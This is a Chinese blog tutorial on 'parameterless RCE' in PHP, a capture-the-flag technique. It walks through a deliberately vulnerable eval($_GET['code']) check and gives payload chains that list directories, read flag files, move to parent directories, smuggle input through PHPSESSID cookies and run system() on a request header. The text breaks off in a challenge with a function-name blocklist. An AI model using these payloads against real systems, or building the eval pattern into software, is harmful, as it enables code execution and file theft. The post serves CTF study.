<!DOCTYPE html>


<html lang="zh-CN">


<head>
  <meta charset="utf-8" />
    
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    无参数RCE |  
  </title>
  <meta name="generator" content="hexo-theme-ayer">
  
  <link rel="shortcut icon" href="/favicon.ico" />
  
  
<link rel="stylesheet" href="/dist/main.css">

  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css">

  
<link rel="stylesheet" href="/css/custom.css">

  
  
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

  
  

  

</head>

</html>

<body>
  <div id="app">
    
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-无参数RCE"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  无参数RCE
</h1>
 

    </header>
     
    <div class="article-meta">
      <a href="/2020/12/03/%E6%97%A0%E5%8F%82%E6%95%B0RCE/" class="article-date">
  <time datetime="2020-12-02T16:00:00.000Z" itemprop="datePublished">2020-12-03</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/">信息安全</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">2.9k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">12 分钟</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <p>无参数RCE：就是只使用函数，且函数不能带有参数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="string">&#x27;;&#x27;</span> === preg_replace(<span class="string">&#x27;/[^\W]+\((?R)?\)/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, $_GET[<span class="string">&#x27;code&#x27;</span>])) &#123;    </span><br><span class="line">    <span class="keyword">eval</span>($_GET[<span class="string">&#x27;code&#x27;</span>]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<a id="more"></a>

<h2 id="代码分析"><a href="#代码分析" class="headerlink" title="代码分析"></a>代码分析</h2><h3 id="preg-replace"><a href="#preg-replace" class="headerlink" title="preg_replace()"></a>preg_replace()</h3><ul>
<li>语法：</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, <span class="keyword">int</span> $limit = <span class="number">-1</span> [, <span class="keyword">int</span> &amp;$count ]] )</span><br></pre></td></tr></table></figure>

<p><code>pattern</code>：要搜索的模式，可以是字符串或一个字符串数组</p>
<p><code>replacement</code>：用于替换的字符串或字符串数组</p>
<p><code>subject</code>：要搜索替换的目标字符串或字符串数组</p>
<p><code>limit</code>：可选，对于每个模式用于每个 subject 字符串的最大可替换次数。 默认是-1（无限制）</p>
<p><code>count</code>：可选，为替换执行的次数</p>
<ul>
<li>简化为：</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">preg_replace(pattern, replacement, subject)</span><br></pre></td></tr></table></figure>

<p>即：将<code>subject</code>中符合<code>pattern</code>的替换为<code>replacement</code></p>
<p>对于<code>preg_replace(&#39;/[^\W]+\((?R)?\)/&#39;, &#39;&#39;, $_GET[&#39;code&#39;])</code></p>
<p>意思是，对传进来的code进行正则匹配，符合正则表达式的部分替换为空，然后返回一个新的字符串</p>
<h3 id="正则表达式"><a href="#正则表达式" class="headerlink" title="正则表达式"></a>正则表达式</h3><p>正则表达式（Regular Expression）描述了一种字符串匹配的模式（pattern），可以用来检查一个串是否含有某种子串、将匹配的子串替换或者从某个串中取出符合某个条件的子串等。</p>
<p><a target="_blank" rel="noopener" href="https://www.runoob.com/regexp/regexp-syntax.html">正则表达式 – 语法 | 菜鸟教程 (runoob.com)</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$str=<span class="string">&#x27;01ABcdEf_230G&#x27;</span>;</span><br><span class="line"><span class="keyword">echo</span> preg_replace(<span class="string">&#x27;/0/&#x27;</span>, <span class="string">&#x27;A&#x27;</span>, $str).<span class="string">&#x27;&lt;br&gt;&#x27;</span>;    <span class="comment">//将0换成A</span></span><br><span class="line"><span class="keyword">echo</span> preg_replace(<span class="string">&#x27;/[0-9]/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, $str).<span class="string">&#x27;&lt;br&gt;&#x27;</span>; <span class="comment">//去掉所有数字</span></span><br><span class="line"><span class="keyword">echo</span> preg_replace(<span class="string">&#x27;/[a-z]/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, $str).<span class="string">&#x27;&lt;br&gt;&#x27;</span>; <span class="comment">//去掉所有小写字母</span></span><br><span class="line"><span class="keyword">echo</span> preg_replace(<span class="string">&#x27;/[A-Z]/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, $str).<span class="string">&#x27;&lt;br&gt;&#x27;</span>; <span class="comment">//去掉所有大写字母</span></span><br><span class="line"><span class="keyword">echo</span> preg_replace(<span class="string">&#x27;/[^A-Z]/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, $str).<span class="string">&#x27;&lt;br&gt;&#x27;</span>; <span class="comment">//去掉除了大写字母外所有的字符</span></span><br><span class="line"><span class="keyword">echo</span> preg_replace(<span class="string">&#x27;/[a-z A-Z]/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, $str).<span class="string">&#x27;&lt;br&gt;&#x27;</span>;	<span class="comment">//去掉所有大小写字母</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p>A1ABcdEf_23AG<br>ABcdEf_G<br>01ABE_230G<br>01cdf_230<br>ABEG<br>01_230<br></p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a = <span class="string">&quot;abcABC123_+-*/&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> preg_replace(<span class="string">&#x27;/[\w]/&#x27;</span>, <span class="string">&#x27;!&#x27;</span>, $a).<span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> preg_replace(<span class="string">&#x27;/[\W]/&#x27;</span>, <span class="string">&#x27;!&#x27;</span>, $a).<span class="string">&quot;&lt;hr&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> preg_replace(<span class="string">&#x27;/[^\W]/&#x27;</span>, <span class="string">&#x27;!&#x27;</span>, $a).<span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p>!!!!!!!!!!+-<em>/<br>abcABC123_!!!!<br>!!!!!!!!!!+-</em>/<br></p>
</blockquote>
<p><code>\w</code>：匹配字母、数字、下划线。等价于<code>[A-Z a-z 0-9 _]</code></p>
<p><code>\W</code>：匹配非字母、数字、下划线。等价于<code>[^A-Z a-z 0-9 _]</code></p>
<p>而<code>(?R)</code>是引用当前表达式的意思，即可以用<code>/[^\W]+\((?R)?\)/</code>替换到<code>(?R)</code>的位置</p>
<p><code>(?R)?</code> 这里多一个?表示可以有引用，也就是说可以衍生匹配。</p>
<p>即：<code>(?R)?</code>表示递归整个匹配模式</p>
<p>所以<code>/[^\W]+\((?R)?\)/</code>合起来就是匹配无参数的函数，函数内部可以无限嵌套相同的模式，也就是说只匹配<code>字符串+()</code>的类型，并且括号内为<code>空字符串</code>或<code>字符串+()</code>。</p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>所以对于<code>preg_replace(&#39;/[^\W]+\((?R)?\)/&#39;, &#39;&#39;, $_GET[&#39;code&#39;])</code></p>
<p>像<code>fun1(fun2(fun3()))</code>最终会被替换为空</p>
<p>而<code>fun1(fun2(fun3(aaa)))</code>则不会进行替换，结果仍为<code>fun1(fun2(fun3(aaa)))</code></p>
<p><img src="https://s3.ax1x.com/2020/11/26/DBRnKg.png"></p>
<br>

<h2 id="常用函数"><a href="#常用函数" class="headerlink" title="常用函数"></a>常用函数</h2><h3 id="show-source"><a href="#show-source" class="headerlink" title="show_source()"></a>show_source()</h3><p>扩展：highlight_file() 高亮读取文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">show_source()函数对文件进行语法高亮提示</span><br><span class="line">show_source(filename,return)</span><br></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th align="left">参数</th>
<th align="left">描述</th>
</tr>
</thead>
<tbody><tr>
<td align="left">filename</td>
<td align="left">必需。要进行高亮处理的 PHP 文件的路径。</td>
</tr>
<tr>
<td align="left">return</td>
<td align="left">可选。如果设置 true，则本函数返回高亮处理的代码。</td>
</tr>
</tbody></table>
<ul>
<li>test.php</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="keyword">__FILE__</span>.<span class="string">&#x27;&lt;br&gt;&#x27;</span>;</span><br><span class="line">show_source(<span class="keyword">__FILE__</span>).<span class="string">&quot;&lt;hr&gt;&quot;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://s1.ax1x.com/2020/08/17/dZ6b9J.png" alt="dZ6b9J.png"></p>
<h3 id="localeconv"><a href="#localeconv" class="headerlink" title="localeconv()"></a>localeconv()</h3><p>localeconv() 函数返回一包含本地数字及货币格式信息的数组，且第一个元素为点（.)。</p>
<p>localeconv() 函数会返回以下数组元素：</p>
<ul>
<li>[decimal_point] - 小数点字符</li>
<li>[thousands_sep] - 千位分隔符</li>
<li>[int_curr_symbol] - 货币符号 （例如：USD）</li>
<li>[currency_symbol] - 货币符号 （例如：$）</li>
<li>[mon_decimal_point] - 货币小数点字符</li>
<li>[mon_thousands_sep] - 货币千位分隔符</li>
<li>[positive_sign] - 正值字符</li>
<li>[negative_sign] - 负值字符</li>
<li>[int_frac_digits] - 国际通用小数位</li>
<li>[frac_digits] - 本地通用小数位</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">var_dump(localeconv());</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p>array(18) {<br>  [“decimal_point”]=&gt;<br>  string(1) “.”<br>  [“thousands_sep”]=&gt;<br>  string(0) “”<br>  [“int_curr_symbol”]=&gt;<br>  string(0) “”<br>  [“currency_symbol”]=&gt;<br>  string(0) “”<br>  [“mon_decimal_point”]=&gt;<br>  string(0) “”<br>  [“mon_thousands_sep”]=&gt;<br>  string(0) “”<br>  [“positive_sign”]=&gt;<br>  string(0) “”<br>  [“negative_sign”]=&gt;<br>  string(0) “”<br>  [“int_frac_digits”]=&gt;<br>  int(127)<br>  [“frac_digits”]=&gt;<br>  int(127)<br>  [“p_cs_precedes”]=&gt;<br>  int(127)<br>  [“p_sep_by_space”]=&gt;<br>  int(127)<br>  [“n_cs_precedes”]=&gt;<br>  int(127)<br>  [“n_sep_by_space”]=&gt;<br>  int(127)<br>  [“p_sign_posn”]=&gt;<br>  int(127)<br>  [“n_sign_posn”]=&gt;<br>  int(127)<br>  [“grouping”]=&gt;<br>  array(0) {<br>  }<br>  [“mon_grouping”]=&gt;<br>  array(0) {<br>  }<br>}</p>
</blockquote>
<h3 id="pos"><a href="#pos" class="headerlink" title="pos()"></a>pos()</h3><p>pos() 函数返回数组中的当前元素的值（取第一个元素）。</p>
<p>该函数是 <a target="_blank" rel="noopener" href="https://www.w3school.com.cn/php/func_array_current.asp">current()</a> 函数的别名。</p>
<p>如果pos()和current()都被过滤了，可以使用reset()。</p>
<p>每个数组中都有一个内部的指针指向它的”当前”元素，初始指向插入到数组中的第一个元素。</p>
<p>相关的方法：</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.w3school.com.cn/php/func_array_current.asp">current()</a> - 返回数组中的当前元素的值</li>
<li><a target="_blank" rel="noopener" href="https://www.w3school.com.cn/php/func_array_end.asp">end()</a> - 将内部指针指向数组中的最后一个元素，并输出</li>
<li><a target="_blank" rel="noopener" href="https://www.w3school.com.cn/php/func_array_next.asp">next()</a> - 将内部指针指向数组中的下一个元素，并输出</li>
<li><a target="_blank" rel="noopener" href="https://www.w3school.com.cn/php/func_array_prev.asp">prev()</a> - 将内部指针指向数组中的上一个元素，并输出</li>
<li><a target="_blank" rel="noopener" href="https://www.w3school.com.cn/php/func_array_reset.asp">reset()</a> - 将内部指针指向数组中的第一个元素，并输出</li>
<li><a target="_blank" rel="noopener" href="https://www.w3school.com.cn/php/func_array_each.asp">each()</a> - 返回当前元素的键名和键值，并将内部指针向前移动</li>
</ul>
<h3 id="scandir"><a href="#scandir" class="headerlink" title="scandir()"></a>scandir()</h3><p>scandir() 函数返回指定目录中的文件和目录的数组。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">scandir(directory,sorting_order,context);</span><br></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th align="left">参数</th>
<th align="left">描述</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><em>directory</em></td>
<td align="left">必需。规定要扫描的目录。</td>
</tr>
<tr>
<td align="left"><em>sorting_order</em></td>
<td align="left">可选。规定排列顺序。默认是 0，表示按字母升序排列。如果设置为 SCANDIR_SORT_DESCENDING 或者 1，则表示按字母降序排列。如果设置为 SCANDIR_SORT_NONE，则返回未排列的结果。</td>
</tr>
<tr>
<td align="left"><em>context</em></td>
<td align="left">可选。规定目录句柄的环境。<em>context</em> 是可修改目录流的行为的一套选项。</td>
</tr>
</tbody></table>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">var_dump(scandir(<span class="string">&#x27;D:\ant&#x27;</span>));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://s1.ax1x.com/2020/08/17/dZgcyn.png" alt="dZgcyn.png"></p>
<h3 id="chr"><a href="#chr" class="headerlink" title="chr()"></a>chr()</h3><p>chr() 函数从指定的 ASCII 值返回字符。</p>
<p>ASCII 值可被指定为十进制值、八进制值或十六进制值。八进制值被定义为带前置 0，而十六进制值被定义为带前置 0x；</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> chr(<span class="number">61</span>) . <span class="string">&quot;&lt;br&gt;&quot;</span>; <span class="comment">// 十进制</span></span><br><span class="line"><span class="keyword">echo</span> chr(<span class="number">061</span>) . <span class="string">&quot;&lt;br&gt;&quot;</span>; <span class="comment">// 八进制值</span></span><br><span class="line"><span class="keyword">echo</span> chr(<span class="number">0x61</span>) . <span class="string">&quot;&lt;br&gt;&quot;</span>; <span class="comment">// 十六进制值</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p>=<br>1<br>a<br></p>
</blockquote>
<h3 id="chdir"><a href="#chdir" class="headerlink" title="chdir()"></a>chdir()</h3><p><code>chdir()</code> 函数当参数为两个点的时候能够跳转到上层目录，相当于在命令行输入cd..会返回上一级目录。</p>
<p>DOS的Chdir（cd）命令可以显示当前目录的名称或者更改当前的目录。</p>
<p>一般当前显示的路径是”C:\Users\Administrator”，如果想要跳转到D盘的Test文件夹(“D:\test\”)可以直接使用DOS命令<strong>cd /d d:\test</strong></p>
<p>如果想要跳转到当前路径的上一级路径可以直接用DOS命令<strong>cd ..</strong></p>
<p>如果想要获取cd命令的具体用法，可以直接输入<strong>cd /?</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> getcwd().<span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">chdir(<span class="string">&quot;app&quot;</span>);</span><br><span class="line"><span class="keyword">echo</span> getcwd().<span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">chdir(<span class="string">&quot;..&quot;</span>);</span><br><span class="line"><span class="keyword">echo</span> getcwd().<span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<blockquote>
<p>D:\phpStudy\PHPTutorial\WWW<br>D:\phpStudy\PHPTutorial\WWW\app<br>D:\phpStudy\PHPTutorial\WWW</p>
</blockquote>
<h3 id="localtime"><a href="#localtime" class="headerlink" title="localtime()"></a>localtime()</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">localtime(timestamp,is_assoc);</span><br></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th align="left">参数</th>
<th align="left">描述</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><em>timestamp</em></td>
<td align="left">可选。规定 Unix 时间戳。如果未规定 <em>timestamp</em>，则默认为当前的本地时间 time()。</td>
</tr>
<tr>
<td align="left"><em>is_assoc</em></td>
<td align="left">可选。规定返回关联数组还是索引数组。如果为 FALSE，则返回索引数组。如果为 TRUE，则返回关联数组。默认为 FALSE。关联数组的键名如下：[tm_sec] - 秒数[tm_min] - 分钟数[tm_hour] - 小时[tm_mday] - 月份中的第几天[tm_mon] - 年份中的第几个月，从 0 开始表示一月份[tm_year] - 年份，从 1900 开始[tm_wday] - 星期中的第几天 (Sunday=0)[tm_yday] - 年中的第几天[tm_isdst] - 夏令时当前是否生效</td>
</tr>
</tbody></table>
<br>

<h2 id="例子"><a href="#例子" class="headerlink" title="例子"></a>例子</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="string">&#x27;;&#x27;</span> === preg_replace(<span class="string">&#x27;/[^\W]+\((?R)?\)/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, $_GET[<span class="string">&#x27;code&#x27;</span>])) &#123;</span><br><span class="line">    <span class="keyword">eval</span>($_GET[<span class="string">&#x27;code&#x27;</span>]);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://s1.ax1x.com/2020/07/19/UfZFsK.png" alt="UfZFsK.png"></p>
<h3 id="方法一"><a href="#方法一" class="headerlink" title="方法一"></a>方法一</h3><p>可以利用<code>eval()</code>读取目录</p>
<ul>
<li>用scandir()读取目录源码，但必须带有参数（’.’），无法通过正则匹配</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">var_dump(scandir(<span class="string">&#x27;.&#x27;</span>));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://s1.ax1x.com/2020/07/20/UflsPO.png" alt="UflsPO.png"></p>
<ul>
<li>用pos()取localeconv()返回的数组的第一个元素，也就是”.”</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">var_dump(scandir(pos(localeconv())));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://s1.ax1x.com/2020/07/20/Ufloi8.png" alt="Ufloi8.png"></p>
<p><code>code.php?code=var_dump(scandir(pos(localeconv())));</code></p>
<p><img src="https://s1.ax1x.com/2020/07/20/Uflvd0.png" alt="Uflvd0.png"></p>
<ul>
<li>用end()选择最后一个文件并用readfile()读取</li>
</ul>
<p><code>code.php?code=var_dump(readfile(end(scandir(pos(localeconv())))));</code></p>
<blockquote>
<p>readfile()   输出一个文件</p>
<p>show_source() 与 echo(readfile())效果一样，可代替使用。</p>
</blockquote>
<p><img src="https://s1.ax1x.com/2020/07/20/Uf1kLR.png" alt="Uf1kLR.png"></p>
<h3 id="方法二"><a href="#方法二" class="headerlink" title="方法二"></a>方法二</h3><p>利用当前秒数构造点  ，利用localtime()中返回的秒数来构造点，点的aiisc码正好是46在60秒之内，我们只需等到46秒时候就能将点给构造出来。</p>
<ul>
<li>chr(current(localtime(time())))</li>
</ul>
<p>利用chr(46)就是字符<code>.</code></p>
<p>数组第一个值每秒+1，所以最多60秒就一定能得到46</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">var_dump(chr(pos(localtime())));</span><br></pre></td></tr></table></figure>

<p>最终payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;39.107.126.173:8080&#x2F;code&#x2F;code.php? code&#x3D;var_dump(readfile(end(scandir(chr(pos(localtime()))))));</span><br></pre></td></tr></table></figure>

<h3 id="方法三"><a href="#方法三" class="headerlink" title="方法三"></a>方法三</h3><p>利用SESSIONID来传参</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show_source(session_id(session_start()));</span><br></pre></td></tr></table></figure>

<p>在cookie处传参</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PHPSESSID&#x3D;flag.php</span><br></pre></td></tr></table></figure>

<p><img src="https://s1.ax1x.com/2020/07/20/Uf1UfS.png" alt="Uf1UfS.png"></p>
<p><img src="https://s1.ax1x.com/2020/07/20/U4hJsS.png" alt="U4hJsS.png"></p>
<h3 id="方法四"><a href="#方法四" class="headerlink" title="方法四"></a>方法四</h3><p>利用 getallheaders() 来获取参数RCE</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo(system(end(getallheaders()))); </span><br></pre></td></tr></table></figure>

<p>在最后在最后一条请求头添加</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat flag.php</span><br></pre></td></tr></table></figure>

<p><img src="https://s1.ax1x.com/2020/08/17/dZ78KO.png" alt="dZ78KO.png"></p>
<br>

<h2 id="读取目录文件"><a href="#读取目录文件" class="headerlink" title="读取目录文件"></a>读取目录文件</h2><ul>
<li>如果文件是最后一个，可以用</li>
</ul>
<p><code>show_source(end(scandir(getcwd())));</code></p>
<blockquote>
<p>或者用<code>readfile()</code>、<code>highlight_file()</code>、<code>file_get_contents()</code>、<code>readgzfile()</code>等读文件函数</p>
</blockquote>
<ul>
<li>如果文件是倒数第二个，可以用</li>
</ul>
<p><code>show_source(next(array_reverse(scandir(getcwd()))));</code></p>
<blockquote>
<p><code>array_reverse()</code>以相反的元素顺序返回数组</p>
</blockquote>
<ul>
<li>如果不是数组的最后一个或者倒数第二个，可以用</li>
</ul>
<p><code>show_source(array_rand(array_flip(scandir(getcwd()))));</code></p>
<p>或者：</p>
<p><code>show_source(array_rand(array_flip(scandir(current(localeconv())))));</code></p>
<blockquote>
<p><code>array_flip()</code>函数会交换数组的键名和键值，<code>array_rand()</code>函数会返回数组中的随机键名</p>
</blockquote>
<br>

<h2 id="跳转目录情况"><a href="#跳转目录情况" class="headerlink" title="跳转目录情况"></a>跳转目录情况</h2><ul>
<li><p>假设ﬂag在上层目录文件的情况，我们需要跳转到上层目录。 </p>
</li>
<li><p><code>chdir()</code> 函数当参数为两个点的时候能够跳转到上层目录。<code>scandir()</code> ，读取当前目录在第二个元素就能读取两个点</p>
</li>
<li><p><code>localtime</code>第一个参数是时间戳，所以我们不能直接嵌套，需要带一个time函数作为嵌套、time函数能够返回时间戳 </p>
</li>
<li><p>构造读取上层目录payload</p>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo(implode(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv())))))))))));</span><br></pre></td></tr></table></figure>

<ul>
<li>构造读取上层目录文件payload</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));</span><br></pre></td></tr></table></figure>

<br>

<h2 id="其它小技巧"><a href="#其它小技巧" class="headerlink" title="其它小技巧"></a>其它小技巧</h2><ul>
<li>利用chr(46)就是字符<code>.</code></li>
</ul>
<p>phpversion()会返回php版本，如<code>5.6.27</code></p>
<p><code>floor(phpversion())</code>返回<code>5</code></p>
<p><code>sqrt(floor(phpversion()))</code>返回<code>2.2360679774998</code></p>
<p><code>tan(floor(sqrt(floor(phpversion()))))</code>返回<code>-2.1850398632615</code></p>
<p><code>cosh(tan(floor(sqrt(floor(phpversion())))))</code>返回<code>4.5017381103491</code></p>
<p><code>sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))</code>返回<code>45.081318677156</code></p>
<p><code>ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))</code>返回<code>46</code></p>
<p>即：<code>chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))</code>等于<code>.</code></p>
<ul>
<li>利用三角函数构造斜杠</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chr(floor(tan(tan(atan(atan(ord(cos(fclose(tmpfile())))))))));</span><br></pre></td></tr></table></figure>

<ul>
<li>利用随机令牌构造点</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo(implode(scandir(chr(strrev(uniqid())))));</span><br></pre></td></tr></table></figure>

<ul>
<li>查看上一级目录文件名</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">print_r(scandir(dirname(getcwd())));</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">print_r(scandir(next(scandir(getcwd()))));</span><br></pre></td></tr></table></figure>

<br>

<h2 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//flag in flag.php</span></span><br><span class="line">$a=<span class="string">&quot;&quot;</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="string">&#x27;;&#x27;</span> === preg_replace(<span class="string">&#x27;/[^\W]+\((?R)?\)/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, $_GET[<span class="string">&#x27;code&#x27;</span>])) &#123;    </span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;/ses|pos|end|next|name|chdir|var|impolode|tan|tall|sys|eval|var|high|show|read|base|url|print/i&quot;</span>, $_GET[<span 